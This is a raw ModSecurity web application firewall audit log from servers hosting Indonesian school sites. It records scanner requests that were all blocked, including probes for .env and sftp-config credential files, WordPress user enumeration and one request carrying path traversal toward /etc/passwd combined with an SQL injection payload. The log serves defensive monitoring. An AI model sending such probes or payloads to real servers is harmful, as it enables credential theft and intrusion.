(http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1748e028-Z-- --6ec9c902-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSfswAAAM4 103.236.140.4 34986 103.236.140.4 8181 --6ec9c902-B-- GET /.env.tar HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855500 --6ec9c902-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6ec9c902-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168291668 711 (- - -) Stopwatch2: 1746605168291668 711; combined=272, p1=238, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ec9c902-Z-- --2424487e-A-- [07/May/2025:15:06:08 +0700] aBsUcIyiPdJj1JUH57qD5AAAAAs 103.236.140.4 34990 103.236.140.4 8181 --2424487e-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933004 --2424487e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2424487e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168327037 785 (- - -) Stopwatch2: 1746605168327037 785; combined=323, p1=289, p2=0, p3=0, p4=0, p5=34, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2424487e-Z-- --fe87cd04-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSftAAAAMA 103.236.140.4 34994 103.236.140.4 8181 --fe87cd04-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855503 --fe87cd04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fe87cd04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168361567 691 (- - -) Stopwatch2: 1746605168361567 691; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe87cd04-Z-- --06089d09-A-- [07/May/2025:15:06:08 +0700] aBsUcG3ZWOH0zu5xiSSftQAAAMs 103.236.140.4 34998 103.236.140.4 8181 --06089d09-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 140933007 --06089d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --06089d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168437428 659 (- - -) Stopwatch2: 1746605168437428 659; combined=256, p1=222, p2=0, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06089d09-Z-- --92127a31-A-- [07/May/2025:15:06:08 +0700] aBsUcF2wLCWKKTe5QCHHHgAAAEE 103.236.140.4 35004 103.236.140.4 8181 --92127a31-B-- GET /.env.tar.gz HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Cookie: X-Forwarded-For: 178.128.17.205 Accept-Encoding: gzip X-Varnish: 143855506 --92127a31-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --92127a31-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746605168512256 700 (- - -) Stopwatch2: 1746605168512256 700; combined=262, p1=229, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92127a31-Z-- --27cd826e-A-- [07/May/2025:15:35:52 +0700] aBsbaG3ZWOH0zu5xiSSh5gAAANI 103.236.140.4 45824 103.236.140.4 8181 --27cd826e-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --27cd826e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27cd826e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.smkn22-jkt.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746606952006859 2308 (- - -) Stopwatch2: 1746606952006859 2308; combined=1030, p1=379, p2=619, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27cd826e-Z-- --3b2f3274-A-- [07/May/2025:15:48:22 +0700] aBseVkkjCPYF0_E6F_IuXQAAAIo 103.236.140.4 46168 103.236.140.4 8181 --3b2f3274-B-- GET /?2wl640bIwNkCwqxcT3xEFR5iKyt=../../../../../../../../etc/passwd&2wl640bIwNkCwqxcT3xEFR5iKyt=1%20and%20updatexml(1,concat(0x7e,(select%20md5(72300))),1) HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --3b2f3274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b2f3274-E-- --3b2f3274-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||www.smkn22-jkt.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?2wl640bIwNkCwqxcT3xEFR5iKyt=../../../../../../../../etc/passwd&2wl640bIwNkCwqxcT3xEFR5iKyt=1%20and%20updatexml(1,concat(0x7e,(select%20md5(72300))),1)"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746607702040285 1972 (- - -) Stopwatch2: 1746607702040285 1972; combined=603, p1=385, p2=184, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b2f3274-Z-- --f1da561f-A-- [07/May/2025:15:53:53 +0700] aBsfoUkjCPYF0_E6F_IvGQAAAJQ 103.236.140.4 48718 103.236.140.4 8181 --f1da561f-B-- GET /ldlogon.dll HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 51.79.229.86 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 51.79.229.86 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Accept-Language: en --f1da561f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1da561f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.smkn22-jkt.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746608033040641 1867 (- - -) Stopwatch2: 1746608033040641 1867; combined=820, p1=379, p2=411, p3=0, p4=0, p5=30, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1da561f-Z-- --02ec0a01-A-- [07/May/2025:16:19:11 +0700] aBslj12wLCWKKTe5QCHPfgAAAEU 103.236.140.4 34266 103.236.140.4 8181 --02ec0a01-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.10.93.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.10.93.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02ec0a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02ec0a01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746609551960992 2770 (- - -) Stopwatch2: 1746609551960992 2770; combined=1266, p1=439, p2=797, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02ec0a01-Z-- --e3de0f49-A-- [07/May/2025:16:22:20 +0700] aBsmTG3ZWOH0zu5xiSSl8gAAAMM 103.236.140.4 35936 103.236.140.4 8181 --e3de0f49-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.109.167.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.109.167.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e3de0f49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3de0f49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746609740046943 2792 (- - -) Stopwatch2: 1746609740046943 2792; combined=1246, p1=435, p2=782, p3=0, p4=0, p5=29, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3de0f49-Z-- --1addb974-A-- [07/May/2025:16:34:37 +0700] aBspLW3ZWOH0zu5xiSSmvwAAAMQ 103.236.140.4 37970 103.236.140.4 8181 --1addb974-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.254.241.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.254.241.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1addb974-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1addb974-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746610477528658 2774 (- - -) Stopwatch2: 1746610477528658 2774; combined=1234, p1=422, p2=783, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1addb974-Z-- --89060f06-A-- [07/May/2025:16:58:05 +0700] aBsurUkjCPYF0_E6F_IyiAAAAI4 103.236.140.4 38330 103.236.140.4 8181 --89060f06-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.224.170.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.224.170.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89060f06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89060f06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746611885563493 2803 (- - -) Stopwatch2: 1746611885563493 2803; combined=1179, p1=399, p2=754, p3=0, p4=0, p5=26, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89060f06-Z-- --5373d835-A-- [07/May/2025:17:02:21 +0700] aBsvrV2wLCWKKTe5QCHQhAAAAFI 103.236.140.4 38344 103.236.140.4 8181 --5373d835-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 163.47.203.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 163.47.203.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5373d835-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5373d835-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746612141374378 2710 (- - -) Stopwatch2: 1746612141374378 2710; combined=1255, p1=376, p2=846, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5373d835-Z-- --0786297f-A-- [07/May/2025:18:23:28 +0700] aBtCsIyiPdJj1JUH57qKWgAAAAQ 103.236.140.4 38826 103.236.140.4 8181 --0786297f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 Accept-Charset: utf-8 --0786297f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0786297f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746617008073680 914 (- - -) Stopwatch2: 1746617008073680 914; combined=354, p1=309, p2=0, p3=0, p4=0, p5=45, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0786297f-Z-- --a6779c4a-A-- [07/May/2025:18:43:21 +0700] aBtHWW3ZWOH0zu5xiSSnCgAAAM4 103.236.140.4 38944 103.236.140.4 8181 --a6779c4a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.12.226.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.12.226.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a6779c4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6779c4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746618201766437 3405 (- - -) Stopwatch2: 1746618201766437 3405; combined=1521, p1=485, p2=1003, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6779c4a-Z-- --58ec2b17-A-- [07/May/2025:19:12:41 +0700] aBtOOW3ZWOH0zu5xiSSnHAAAANM 103.236.140.4 39178 103.236.140.4 8181 --58ec2b17-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 141.140.12.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 141.140.12.53 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --58ec2b17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ec2b17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746619961701130 970 (- - -) Stopwatch2: 1746619961701130 970; combined=386, p1=349, p2=0, p3=0, p4=0, p5=37, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ec2b17-Z-- --219c1457-A-- [07/May/2025:19:29:57 +0700] aBtSRW3ZWOH0zu5xiSSnKAAAANM 103.236.140.4 39266 103.236.140.4 8181 --219c1457-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.235.185.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.185.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --219c1457-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --219c1457-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746620997292906 3186 (- - -) Stopwatch2: 1746620997292906 3186; combined=1354, p1=495, p2=830, p3=0, p4=0, p5=29, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
